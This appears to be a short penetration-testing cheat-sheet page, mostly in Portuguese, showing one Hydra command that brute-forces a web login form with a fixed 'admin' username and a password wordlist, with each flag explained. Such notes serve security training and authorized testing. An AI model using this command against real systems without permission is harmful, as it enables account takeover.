Login Form Attacks

Força bruta do formulário de login - usuário estático, lista de palavras aprovadas

hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

-l: Nome de usuário alvo.
-P: Arquivo contendo lista de senhas.
-f: Parar no primeiro sucesso.
SERVER_IP: Endereço IP do servidor alvo.
-s PORT: Número da porta do serviço alvo.
http-post-form: Especificação do formulário de login e critérios de sucesso.

Last updated 1 year ago